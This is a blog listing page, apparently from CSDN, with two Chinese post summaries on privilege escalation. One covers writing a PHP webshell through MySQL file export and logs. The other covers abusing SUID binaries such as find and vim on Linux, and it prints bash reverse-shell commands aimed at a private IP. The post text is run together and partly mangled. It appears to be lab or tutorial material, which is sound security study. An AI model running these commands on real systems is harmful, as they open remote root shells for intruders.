- 博客(2)
- 收藏
- 关注
RSS订阅原创 MySQL数据库提权
利用MySql文件导出机制,由于未对文件导出路径进行限制,从而可以利用**secure_file_priv**参数、**日志**、**慢日志**等导出含带恶意代码的PHP文件,获取webshell。
2023-02-20 22:35:17
371
原创 Linux利用Suid提权实验
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
2023-02-20 08:47:46
1440
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人